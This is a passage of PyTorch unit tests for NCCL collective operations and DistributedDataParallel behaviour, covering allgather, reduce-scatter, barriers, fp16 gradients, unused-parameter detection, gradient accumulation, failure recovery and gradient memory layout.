with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# allgather_base is GPU number agnostic.
# Each rank contribute one tensor regardless of GPU counts
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size), dtype=tensor.dtype).cuda(device_id)
allgather_base(output_t, tensor)
# Verification
self.assertEqual(torch.arange(self.world_size), output_t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticpate an error
with self.assertRaisesRegex(
RuntimeError,
"output tensor size must be equal to world_size times input tensor size",
):
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=tensor.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
allgather_base(output_t, tensor)
# anticpate an error
with self.assertRaisesRegex(
RuntimeError, "output tensor must have the same type as input tensor"
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
allgather_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticpate an error
with self.assertRaisesRegex(
RuntimeError,
"input tensor must be the same size as output size times world size",
):
input_t = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=input_t.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
reduce_scatter_base(output_t, input_t)
# anticpate an error
with self.assertRaisesRegex(
RuntimeError, "input tensor must be the same type as the outut tensor."
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
reduce_scatter_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
# 0 1 2
# 0 [0..11] [1..12]
# 1 [3..14]
# 2
# 3
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# reduce_scatter_base is GPU number agnostic.
# Each rank contribute one tensor regardless of GPU counts
output_t = torch.empty([1]).cuda(device_id)
tensor = torch.arange(self.world_size, dtype=output_t.dtype).cuda(device_id)
reduce_scatter_base(output_t, tensor)
# Verification
self.assertEqual(output_t[0], self.rank * self.world_size)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
# Making the collective to operate on
# 1, 2, 3, 4, .... self.num_gpus GPUs
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
for i in range(2, self.num_gpus + 1):
for j in range(i):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
class DistributedDataParallelTest(
test_c10d_common.AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter, and throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
torch.cuda.set_device(self.rank)
dist.init_process_group(
backend="nccl",
world_size=self.world_size,
rank=self.rank,
init_method=f"file://{self.file_name}",
)
process_group = c10d.distributed_c10d._get_default_group()
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
ddp_model = None
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
nonlocal ddp_model
ddp_model = model
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
# First test that finding unused params under these conditions is to
# trigger an error when `backward` is called (because fc3 is an unused
# parameter and will therefore be marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith(
"Expected to mark a variable ready only once.",
)
)
unused_index = 2
unused_index_str = f"Parameter at index {unused_index}"
model = ddp_model.module
for module_name, module in model.named_modules():
if module == model.fc3:
for parameter_name, _ in module.named_parameters(recurse=False):
unused_fqn = f"{module_name}.{parameter_name}"
# Only one such parameter in model.fc3, since bias=False
break
if dist._get_debug_mode() != dist._DistributedDebugLevel.OFF:
unused_index_str += f" with name {unused_fqn}"
self.assertTrue(unused_index_str in str(ex))
else:
self.fail("Expected exception")
dist.barrier(process_group)
# Then test that the default behavior can be overridden by setting
# `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test find_unused_parameters defaults to False
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# TODO: Combine the following tests once https://github.com/pytorch/pytorch/issues/55967
# is resolved.
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_debug_detail(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_debug_info(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_debug_off(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_detail(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_info(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_off(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has their gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have their gradient set.
check_no_grads()
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement accumulating grads, but
# we would like to make sure DDP does not mess up with the underlying
# module.
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check two model parameters over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradients sync without calling prepare_for_backward
step_model(
ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# need to create a separate file for the recovered FileStore, because
# the original one will be deleted when destructing the first FileStore.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
